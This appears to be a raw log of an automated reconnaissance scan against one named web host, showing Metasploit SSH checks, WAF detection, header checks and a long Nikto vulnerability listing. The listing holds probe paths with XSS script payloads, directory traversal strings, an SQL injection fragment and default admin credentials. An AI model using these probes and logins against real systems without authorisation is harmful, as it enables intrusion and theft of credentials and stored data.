3965[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'Fortimanager_Access' not found
3966[1m[34m[*][0m Scanned 1 of 1 hosts (100% complete)
3967[1m[34m[*][0m Auxiliary module execution completed
3968[0m[0m[1m[31m[-][0m Auxiliary failed: Msf::OptionValidateError The following options failed to validate: KEY_FILE.
3969[0m[0m[1m[32m[+][0m 178.32.123.64:22 - SSH server version: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2 ( service.version=7.2p2 openssh.comment=Ubuntu-4ubuntu2.2 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Ubuntu os.device=General os.family=Linux os.product=Linux os.certainty=0.75 service.protocol=ssh fingerprint_db=ssh.banner )
3970[1m[34m[*][0m pedo-paradise.myminicity.fr:22 - Scanned 1 of 1 hosts (100% complete)
3971[1m[34m[*][0m Auxiliary module execution completed
3972[0m[91m + -- --=[Port 23 closed... skipping.[0m
3973[91m + -- --=[Port 25 closed... skipping.[0m
3974[91m + -- --=[Port 53 closed... skipping.[0m
3975[91m + -- --=[Port 79 closed... skipping.[0m
3976[93m + -- --=[Port 80 opened... running tests...[0m
3977[92m + -- ----------------------------=[Checking for WAF]=------------------------ -- +[0m
3978
3979 ^ ^
3980 _ __ _ ____ _ __ _ _ ____
3981 ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
3982 | V V // o // _/ | V V // 0 // 0 // _/
3983 |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
3984 <
3985 ...'
3986
3987 WAFW00F - Web Application Firewall Detection Tool
3988
3989 By Sandro Gauci && Wendel G. Henrique
3990
3991Checking http://pedo-paradise.myminicity.fr
3992Generic Detection results:
3993No WAF detected by the generic detection
3994Number of requests: 13
3995
3996[92m + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +[0m
3997[1m[34mhttp://pedo-paradise.myminicity.fr[0m [200 OK] [1m[37mApache[0m, [1m[37mCountry[0m[[37mFRANCE[0m][[1m[31mFR[0m], [1m[37mHTTPServer[0m[[1m[36mApache[0m], [1m[37mIP[0m[[37m178.32.123.64[0m], [1m[37mScript[0m[[37mtext/javascript[0m], [1m[37mTitle[0m[[1m[33mMyMiniCity[0m]
3998
3999[94m __ ______ _____ [0m
4000[94m \ \/ / ___|_ _|[0m
4001[94m \ /\___ \ | | [0m
4002[94m / \ ___) || | [0m
4003[94m /_/\_|____/ |_| [0m
4004
4005[94m+ -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield[0m
4006[94m+ -- --=[Target: pedo-paradise.myminicity.fr:80[0m
4007[92m+ -- --=[Site not vulnerable to Cross-Site Tracing![0m
4008[92m+ -- --=[Site not vulnerable to Host Header Injection![0m
4009[91m+ -- --=[Site vulnerable to Cross-Frame Scripting![0m
4010[91m+ -- --=[Site vulnerable to Clickjacking![0m
4011
4012[93mHTTP/1.1 400 Bad Request
4013Date: Thu, 30 Nov 2017 06:04:52 GMT
4014Server: Apache
4015Content-Length: 226
4016Connection: close
4017Content-Type: text/html; charset=iso-8859-1
4018
4019<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
4020<html><head>
4021<title>400 Bad Request</title>
4022</head><body>
4023<h1>Bad Request</h1>
4024<p>Your browser sent a request that this server could not understand.<br />
4025</p>
4026</body></html>
4027[0m
4028[93mHTTP/1.1 400 Bad Request
4029Date: Thu, 30 Nov 2017 06:05:08 GMT
4030Server: Apache
4031Content-Length: 226
4032Connection: close
4033Content-Type: text/html; charset=iso-8859-1
4034
4035<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
4036<html><head>
4037<title>400 Bad Request</title>
4038</head><body>
4039<h1>Bad Request</h1>
4040<p>Your browser sent a request that this server could not understand.<br />
4041</p>
4042</body></html>
4043[0m
4044
4045
4046
4047[92m + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +[0m
4048[94m+ -- --=[Checking if X-Content options are enabled on pedo-paradise.myminicity.fr...[0m [93m
4049
4050[94m+ -- --=[Checking if X-Frame options are enabled on pedo-paradise.myminicity.fr...[0m [93m
4051
4052[94m+ -- --=[Checking if X-XSS-Protection header is enabled on pedo-paradise.myminicity.fr...[0m [93m
4053
4054[94m+ -- --=[Checking HTTP methods on pedo-paradise.myminicity.fr...[0m [93m
4055
4056[94m+ -- --=[Checking if TRACE method is enabled on pedo-paradise.myminicity.fr...[0m [93m
4057
4058[94m+ -- --=[Checking for META tags on pedo-paradise.myminicity.fr...[0m [93m
4059
4060[94m+ -- --=[Checking for open proxy on pedo-paradise.myminicity.fr...[0m [93m
4061<h1>web1</h1>
4062
4063[94m+ -- --=[Enumerating software on pedo-paradise.myminicity.fr...[0m [93m
4064Server: Apache
4065
4066[94m+ -- --=[Checking if Strict-Transport-Security is enabled on pedo-paradise.myminicity.fr...[0m [93m
4067
4068[94m+ -- --=[Checking for Flash cross-domain policy on pedo-paradise.myminicity.fr...[0m [93m
4069<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
4070<html><head>
4071<title>404 Not Found</title>
4072</head><body>
4073<h1>Not Found</h1>
4074<p>The requested URL /crossdomain.xml was not found on this server.</p>
4075</body></html>
4076
4077[94m+ -- --=[Checking for Silverlight cross-domain policy on pedo-paradise.myminicity.fr...[0m [93m
4078<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
4079<html><head>
4080<title>404 Not Found</title>
4081</head><body>
4082<h1>Not Found</h1>
4083<p>The requested URL /clientaccesspolicy.xml was not found on this server.</p>
4084</body></html>
4085
4086[94m+ -- --=[Checking for HTML5 cross-origin resource sharing on pedo-paradise.myminicity.fr...[0m [93m
4087
4088[94m+ -- --=[Retrieving robots.txt on pedo-paradise.myminicity.fr...[0m [93m
4089<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
4090<html><head>
4091<title>404 Not Found</title>
4092</head><body>
4093<h1>Not Found</h1>
4094<p>The requested URL /robots.txt was not found on this server.</p>
4095</body></html>
4096
4097[94m+ -- --=[Retrieving sitemap.xml on pedo-paradise.myminicity.fr...[0m [93m
4098<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
4099<html><head>
4100<title>404 Not Found</title>
4101</head><body>
4102<h1>Not Found</h1>
4103<p>The requested URL /sitemap.xml was not found on this server.</p>
4104</body></html>
4105
4106[94m+ -- --=[Checking cookie attributes on pedo-paradise.myminicity.fr...[0m [93m
4107
4108[94m+ -- --=[Checking for ASP.NET Detailed Errors on pedo-paradise.myminicity.fr...[0m [93m
4109
4110[0m
4111[92m + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +[0m
4112- Nikto v2.1.6
4113---------------------------------------------------------------------------
4114+ Target IP: 178.32.123.64
4115+ Target Hostname: pedo-paradise.myminicity.fr
4116+ Target Port: 80
4117+ Start Time: 2017-11-30 01:07:56 (GMT-5)
4118---------------------------------------------------------------------------
4119+ Server: Apache
4120+ The anti-clickjacking X-Frame-Options header is not present.
4121+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
4122+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
4123+ No CGI Directories found (use '-C all' to force check all possible dirs)
4124+ Server leaks inodes via ETags, header found with file /favicon.ico, fields: 0x47e 0x4632ea3e23900
4125+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
4126+ /kboard/: KBoard Forum 0.3.0 and prior have a security problem in forum_edit_post.php, forum_post.php and forum_reply.php
4127+ /lists/admin/: PHPList pre 2.6.4 contains a number of vulnerabilities including remote administrative access, harvesting user info and more. Default login to admin interface is admin/phplist
4128+ /ssdefs/: Siteseed pre 1.4.2 has 'major' security problems.
4129+ /sshome/: Siteseed pre 1.4.2 has 'major' security problems.
4130+ /tiki/: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin
4131+ /tiki/tiki-install.php: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin
4132+ /scripts/samples/details.idc: See RFP 9901; www.wiretrip.net
4133+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
4134+ /cgi-bin/wrap: comes with IRIX 6.2; allows to view directories
4135+ /forums//admin/config.php: PHP Config file may contain database IDs and passwords.
4136+ /forums//adm/config.php: PHP Config file may contain database IDs and passwords.
4137+ /forums//administrator/config.php: PHP Config file may contain database IDs and passwords.
4138+ /forums/config.php: PHP Config file may contain database IDs and passwords.
4139+ /guestbook/guestbookdat: PHP-Gastebuch 1.60 Beta reveals sensitive information about its configuration.
4140+ /guestbook/pwd: PHP-Gastebuch 1.60 Beta reveals the md5 hash of the admin password.
4141+ /help/: Help directory should not be accessible
4142+ OSVDB-2411: /hola/admin/cms/htmltags.php?datei=./sec/data.php: hola-cms-1.2.9-10 may reveal the administrator ID and password.
4143+ OSVDB-59620: /inc/common.load.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.
4144+ OSVDB-59619: /inc/config.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.
4145+ OSVDB-59618: /inc/dbase.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.
4146+ OSVDB-2703: /geeklog/users.php: Geeklog prior to 1.3.8-1sr2 contains a SQL injection vulnerability that lets a remote attacker reset admin password.
4147+ OSVDB-8204: /gb/index.php?login=true: gBook may allow admin login by setting the value 'login' equal to 'true'.
4148+ /guestbook/admin.php: Guestbook admin page available without authentication.
4149+ /getaccess: This may be an indication that the server is running getAccess for SSO
4150+ /cfdocs/expeval/openfile.cfm: Can use to expose the system/server path.
4151+ /tsweb/: Microsoft TSAC found. http://www.dslwebserver.com/main/fr_index.html?/main/sbs-Terminal-Services-Advanced-Client-Configuration.html
4152+ /vgn/performance/TMT: Vignette CMS admin/maintenance script available.
4153+ /vgn/performance/TMT/Report: Vignette CMS admin/maintenance script available.
4154+ /vgn/performance/TMT/Report/XML: Vignette CMS admin/maintenance script available.
4155+ /vgn/performance/TMT/reset: Vignette CMS admin/maintenance script available.
4156+ /vgn/ppstats: Vignette CMS admin/maintenance script available.
4157+ /vgn/previewer: Vignette CMS admin/maintenance script available.
4158+ /vgn/record/previewer: Vignette CMS admin/maintenance script available.
4159+ /vgn/stylepreviewer: Vignette CMS admin/maintenance script available.
4160+ /vgn/vr/Deleting: Vignette CMS admin/maintenance script available.
4161+ /vgn/vr/Editing: Vignette CMS admin/maintenance script available.
4162+ /vgn/vr/Saving: Vignette CMS admin/maintenance script available.
4163+ /vgn/vr/Select: Vignette CMS admin/maintenance script available.
4164+ /scripts/iisadmin/bdir.htr: This default script shows host info, may allow file browsing and buffer a overrun in the Chunked Encoding data transfer mechanism, request /scripts/iisadmin/bdir.htr??c:\<dirs> . http://www.microsoft.com/technet/security/bulletin/MS02-028.asp. http://www.cert.org/advisories/CA-2002-09.html.
4165+ /scripts/iisadmin/ism.dll: Allows you to mount a brute force attack on passwords
4166+ /scripts/tools/ctss.idc: This CGI allows remote users to view and modify SQL DB contents, server paths, docroot and more.
4167+ OSVDB-4910: /vgn/style: Vignette server may reveal system information through this file.
4168+ OSVDB-17653: /SiteServer/Admin/commerce/foundation/domain.asp: Displays known domains of which that server is involved.
4169+ OSVDB-17654: /SiteServer/Admin/commerce/foundation/driver.asp: Displays a list of installed ODBC drivers.
4170+ OSVDB-17655: /SiteServer/Admin/commerce/foundation/DSN.asp: Displays all DSNs configured for selected ODBC drivers.
4171+ OSVDB-17652: /SiteServer/admin/findvserver.asp: Gives a list of installed Site Server components.
4172+ /SiteServer/Admin/knowledge/dsmgr/default.asp: Used to view current search catalog configurations
4173+ /basilix/mbox-list.php3: BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'message list' function/page
4174+ /basilix/message-read.php3: BasiliX webmail application prior to 1.1.1 contains a XSS issue in 'read message' function/page
4175+ /IlohaMail/blank.html: IlohaMail 0.8.10 contains a XSS vulnerability. Previous versions contain other non-descript vulnerabilities.
4176+ /bb-dnbd/faxsurvey: This may allow arbitrary command execution.
4177+ OSVDB-6591: /scripts/Carello/Carello.dll: Carello 1.3 may allow commands to be executed on the server by replacing hidden form elements. This could not be tested by Nikto.
4178+ /scripts/tools/dsnform.exe: Allows creation of ODBC Data Source
4179+ /scripts/tools/dsnform: Allows creation of ODBC Data Source
4180+ OSVDB-17656: /SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp: Used to create, modify, and potentially delete LDAP users and groups.
4181+ OSVDB-17657: /SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp: Used to create, modify, and potentially delete LDAP users and groups.
4182+ /scripts/httpodbc.dll: Possible IIS backdoor found.
4183+ /scripts/proxy/w3proxy.dll: MSProxy v1.0 installed
4184+ /SiteServer/admin/: Site Server components admin. Default account may be 'LDAP_Anonymous', pass is 'LdapPassword_1'. see http://www.wiretrip.net/rfp/p/doc.asp/i1/d69.htm
4185+ /siteseed/: Siteseed pre 1.4.2 has 'major' security problems.
4186+ /pccsmysqladm/incs/dbconnect.inc: This file should not be accessible, as it contains database connectivity information. Upgrade to version 1.2.5 or higher.
4187+ /iisadmin/: Access to /iisadmin should be restricted to localhost or allowed hosts only.
4188+ /PDG_Cart/oder.log: Shopping cart software log
4189+ /ows/restricted%2eshow: OWS may allow restricted files to be viewed by replacing a character with its encoded equivalent.
4190+ /w-agora/: w-agora pre 4.1.4 may allow a remote user to execute arbitrary PHP scripts via URL includes in include/*.php and user/*.php files. Default account is 'admin' but password set during install.
4191+ OSVDB-6181: /officescan/cgi/cgiChkMasterPwd.exe: Trend Micro Officescan allows you to skip the login page and access some CGI programs directly.
4192+ /pbserver/pbserver.dll: This may contain a buffer overflow. http://www.microsoft.com/technet/security/bulletin/http://www.microsoft.com/technet/security/bulletin/ms00-094.asp.asp
4193+ /administrator/gallery/uploadimage.php: Mambo PHP Portal/Server 4.0.12 BETA and below may allow upload of any file type simply putting '.jpg' before the real file extension.
4194+ /pafiledb/includes/team/file.php: paFileDB 3.1 and below may allow file upload without authentication.
4195+ /phpEventCalendar/file_upload.php: phpEventCalendar 1.1 and prior are vulnerable to file upload bug.
4196+ /servlet/com.unify.servletexec.UploadServlet: This servlet allows attackers to upload files to the server.
4197+ /scripts/cpshost.dll: Posting acceptor possibly allows you to upload files
4198+ /basilix/compose-attach.php3: BasiliX webmail application prior to 1.1.1 contains a non-descript security vulnerability in compose-attach.php3 related to attachment uploads
4199+ /server/: Possibly Macromedia JRun or CRX WebDAV upload
4200+ /vgn/ac/data: Vignette CMS admin/maintenance script available.
4201+ /vgn/ac/delete: Vignette CMS admin/maintenance script available.
4202+ /vgn/ac/edit: Vignette CMS admin/maintenance script available.
4203+ /vgn/ac/esave: Vignette CMS admin/maintenance script available.
4204+ /vgn/ac/fsave: Vignette CMS admin/maintenance script available.
4205+ /vgn/ac/index: Vignette CMS admin/maintenance script available.
4206+ /vgn/asp/MetaDataUpdate: Vignette CMS admin/maintenance script available.
4207+ /vgn/asp/previewer: Vignette CMS admin/maintenance script available.
4208+ /vgn/asp/status: Vignette CMS admin/maintenance script available.
4209+ /vgn/asp/style: Vignette CMS admin/maintenance script available.
4210+ /vgn/errors: Vignette CMS admin/maintenance script available.
4211+ /vgn/jsp/controller: Vignette CMS admin/maintenance script available.
4212+ /vgn/jsp/errorpage: Vignette CMS admin/maintenance script available.
4213+ /vgn/jsp/initialize: Vignette CMS admin/maintenance script available.
4214+ /vgn/jsp/jspstatus: Vignette CMS admin/maintenance script available.
4215+ /vgn/jsp/jspstatus56: Vignette CMS admin/maintenance script available.
4216+ /vgn/jsp/metadataupdate: Vignette CMS admin/maintenance script available.
4217+ /vgn/jsp/previewer: Vignette CMS admin/maintenance script available.
4218+ /vgn/jsp/style: Vignette CMS admin/maintenance script available.
4219+ /vgn/legacy/edit: Vignette CMS admin/maintenance script available.
4220+ /vgn/login: Vignette server may allow user enumeration based on the login attempts to this file.
4221+ OSVDB-35707: /forum/admin/wwforum.mdb: Web Wiz Forums password database found.
4222+ /fpdb/shop.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
4223+ OSVDB-52975: /guestbook/admin/o12guest.mdb: Ocean12 ASP Guestbook Manager allows download of SQL database which contains admin password.
4224+ OSVDB-15971: /MIDICART/midicart.mdb: MIDICART database is available for browsing. This should not be allowed via the web server.
4225+ OSVDB-41850: /mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb: MPCSoftWeb Guest Book passwords retrieved.
4226+ /news/news.mdb: Web Wiz Site News release v3.06 admin password database is available and unencrypted.
4227+ OSVDB-15971: /shoppingdirectory/midicart.mdb: MIDICART database is available for browsing. This should not be allowed via the web server.
4228+ OSVDB-4398: /database/db2000.mdb: Max Web Portal database is available remotely. It should be moved from the default location to a directory outside the web root.
4229+ /admin/config.php: PHP Config file may contain database IDs and passwords.
4230+ /adm/config.php: PHP Config file may contain database IDs and passwords.
4231+ /administrator/config.php: PHP Config file may contain database IDs and passwords.
4232+ OSVDB-6467: /pw/storemgr.pw: Encrypted ID/Pass for Mercantec's SoftCart, http://www.mercantec.com/, see http://www.mindsec.com/advisories/post2.txt for more information.
4233+ /servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter: Allaire ColdFusion allows JSP source viewed through a vulnerable SSI call.
4234+ OSVDB-53303: /simplebbs/users/users.php: Simple BBS 1.0.6 allows user information and passwords to be viewed remotely.
4235+ /typo3conf/: This may contain sensitive TYPO3 files.
4236+ /cms/typo3conf/: This may contain sensitive TYPO3 files.
4237+ /site/typo3conf/: This may contain sensitive TYPO3 files.
4238+ /typo/typo3conf/: This may contain sensitive TYPO3 files.
4239+ /typo3/typo3conf/: This may contain sensitive TYPO3 files.
4240+ /typo3conf/database.sql: TYPO3 SQL file found.
4241+ /cms/typo3conf/database.sql: TYPO3 SQL file found.
4242+ /site/typo3conf/database.sql: TYPO3 SQL file found.
4243+ /typo/typo3conf/database.sql: TYPO3 SQL file found.
4244+ /typo3/typo3conf/database.sql: TYPO3 SQL file found.
4245+ /typo3conf/localconf.php: TYPO3 config file found.
4246+ /cms/typo3conf/localconf.php: TYPO3 config file found.
4247+ /site/typo3conf/localconf.php: TYPO3 config file found.
4248+ /typo/typo3conf/localconf.php: TYPO3 config file found.
4249+ /typo3/typo3conf/localconf.php: TYPO3 config file found.
4250+ OSVDB-53386: /vchat/msg.txt: VChat allows user information to be retrieved.
4251+ OSVDB-4907: /vgn/license: Vignette server license file found.
4252+ /webcart-lite/config/import.txt: This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.
4253+ /webcart-lite/orders/import.txt: This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.
4254+ /webcart/carts/: This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.
4255+ /webcart/config/: This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.
4256+ /webcart/config/clients.txt: This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.
4257+ /webcart/orders/: This may allow attackers to read credit card data. Reconfigure to make this dir not accessible via the web.
4258+ /webcart/orders/import.txt: This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.
4259+ /_mem_bin/auoconfig.asp: Displays the default AUO (LDAP) schema, including host and port.
4260+ OSVDB-17659: /SiteServer/Admin/knowledge/persmbr/vs.asp: Expose various LDAP service and backend configuration parameters
4261+ OSVDB-17661: /SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp: Expose various LDAP service and backend configuration parameters
4262+ OSVDB-17662: /SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp: Expose various LDAP service and backend configuration parameters
4263+ OSVDB-17660: /SiteServer/Admin/knowledge/persmbr/VsTmPr.asp: Expose various LDAP service and backend configuration parameters
4264+ /tvcs/getservers.exe?action=selects1: Following steps 2-4 of this page may reveal a zip file that contains passwords and system details.
4265+ /nsn/fdir.bas:ShowVolume: You can use ShowVolume and ShowDirectory directly on the Novell server (NW5.1) to view the filesystem without having to log in
4266+ /nsn/fdir.bas: You can use fdir to ShowVolume and ShowDirectory.
4267+ /forum/admin/database/wwForum.mdb: Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein
4268+ /webmail/blank.html: IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.
4269+ /jamdb/: JamDB pre 0.9.2 mp3.php and image.php can allow user to read arbitrary file out of docroot.
4270+ OSVDB-1201: /cgi/cgiproc?: It may be possible to crash Nortel Contivity VxWorks by requesting '/cgi/cgiproc?$' (not attempted!). Upgrade to version 2.60 or later.
4271+ OSVDB-6196: /servlet/SchedulerTransfer: PeopleSoft SchedulerTransfer servlet found, which may allow remote command execution. See http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21999
4272+ /servlet/sunexamples.BBoardServlet: This default servlet lets attackers execute arbitrary commands.
4273+ OSVDB-6196: /servlets/SchedulerTransfer: PeopleSoft SchedulerTransfer servlet found, which may allow remote command execution. See http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21999
4274+ /perl/-e%20print%20Hello: The Perl interpreter on the Novell system may allow any command to be executed. See http://www.securityfocus.com/bid/5520. Installing Perl 5.6 might fix this issue.
4275+ /vgn/legacy/save: Vignette Legacy Tool may be unprotected. To access this resource, set a cookie called 'vgn_creds' with any value.
4276+ /IDSWebApp/IDSjsp/Login.jsp: Tivoli Directory Server Web Administration.
4277+ /securecontrolpanel/: Web Server Control Panel
4278+ /siteminder: This may be an indication that the server is running Siteminder for SSO
4279+ /webmail/: Web based mail package installed.
4280+ /_cti_pvt/: FrontPage directory found.
4281+ /nsn/..%5Cutil/attrib.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
4282+ /nsn/..%5Cutil/chkvol.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
4283+ /nsn/..%5Cutil/copy.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
4284+ /nsn/..%5Cutil/del.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
4285+ /nsn/..%5Cutil/dir.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
4286+ /nsn/..%5Cutil/dsbrowse.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
4287+ /nsn/..%5Cutil/glist.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
4288+ /nsn/..%5Cutil/lancard.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
4289+ /nsn/..%5Cutil/md.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
4290+ /nsn/..%5Cutil/rd.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
4291+ /nsn/..%5Cutil/ren.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
4292+ /nsn/..%5Cutil/send.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
4293+ /nsn/..%5Cutil/set.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
4294+ /nsn/..%5Cutil/slist.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
4295+ /nsn/..%5Cutil/type.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
4296+ /nsn/..%5Cutil/userlist.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
4297+ /nsn/..%5Cweb/env.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
4298+ /nsn/..%5Cweb/fdir.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
4299+ /nsn/..%5Cwebdemo/env.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
4300+ /nsn/..%5Cwebdemo/fdir.bas: Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server
4301+ /upd/: WASD Server can allow directory listings by requesting /upd/directory/. Upgrade to a later version and secure according to the documents on the WASD web site.
4302+ /CVS/Entries: CVS Entries file may contain directory listing information.
4303+ OSVDB-8450: /3rdparty/phpMyAdmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
4304+ OSVDB-8450: /phpMyAdmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
4305+ OSVDB-8450: /3rdparty/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
4306+ OSVDB-8450: /phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
4307+ OSVDB-8450: /pma/db_details_importdocsql.php?submit_show=true&do=import&docpath=../: phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. http://www.securityfocus.com/bid/7963.
4308+ OSVDB-31150: /USER/CONFIG.AP: MIPCD configuration information. MIPCD should not have the web interface enabled.
4309+ /admin-serv/config/admpw: This file contains the encrypted Netscape admin password. It should not be accessible via the web.
4310+ /cgi-bin/cgi_process: WASD reveals a lot of system information in this script. It should be removed.
4311+ /ht_root/wwwroot/-/local/httpd$map.conf: WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.
4312+ /local/httpd$map.conf: WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.
4313+ /tree: WASD Server reveals the entire web root structure and files via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.
4314+ /852566C90012664F: This database can be read using the replica ID without authentication.
4315+ /examples/servlet/AUX: Apache Tomcat versions below 4.1 may be vulnerable to DoS by repeatedly requesting this file.
4316+ /contents/extensions/asp/1: The IIS system may be vulnerable to a DOS, see http://www.microsoft.com/technet/security/bulletin/MS02-018.asp for details.
4317+ /cgi-win/cgitest.exe: This CGI may allow the server to be crashed remotely, see http://www.securityoffice.net/ for details. Remove this default CGI.
4318+ /cgi-shl/win-c-sample.exe: win-c-sample.exe has a buffer overflow
4319+ /.nsf/../winnt/win.ini: This win.ini file can be downloaded.
4320+ OSVDB-728: /admentor/adminadmin.asp: Version 2.11 of AdMentor is vulnerable to SQL injection during login, in the style of: ' or =
4321+ OSVDB-36894: /My_eGallery/public/displayCategory.php: My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.
4322+ OSVDB-36894: /postnuke/My_eGallery/public/displayCategory.php: My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.
4323+ OSVDB-36894: /postnuke/html/My_eGallery/public/displayCategory.php: My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.
4324+ OSVDB-36894: /modules/My_eGallery/public/displayCategory.php: My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.
4325+ OSVDB-36894: /phpBB/My_eGallery/public/displayCategory.php: My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.
4326+ OSVDB-36894: /forum/My_eGallery/public/displayCategory.php: My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.
4327+ OSVDB-2767: /openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>: OpenAutoClassifieds 1.0 is vulnerable to a XSS attack
4328+ OSVDB-4015: /jigsaw/: Jigsaw server may be installed. Versions lower than 2.2.1 are vulnerable to Cross Site Scripting (XSS) in the error page.
4329+ OSVDB-2754: /guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E: MPM Guestbook 1.2 and previous are vulnreable to XSS attacks.
4330+ /anthill/login.php: Anthill bug tracking system may be installed. Versions lower than 0.1.6.1 allow XSS/HTML injection and may allow users to bypass login requirements. http://anthill.vmlinuz.ca/ and http://www.cert.org/advisories/CA-2000-02.html
4331+ /cfdocs/expeval/sendmail.cfm: Can be used to send email; go to the page and fill in the form
4332+ OSVDB-22: /cgi-bin/bigconf.cgi: BigIP Configuration CGI
4333+ /ammerum/: Ammerum pre 0.6-1 had several security issues.
4334+ /ariadne/: Ariadne pre 2.1.2 has several vulnerabilities. The default login/pass to the admin page is admin/muze.
4335+ /cbms/cbmsfoot.php: CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/
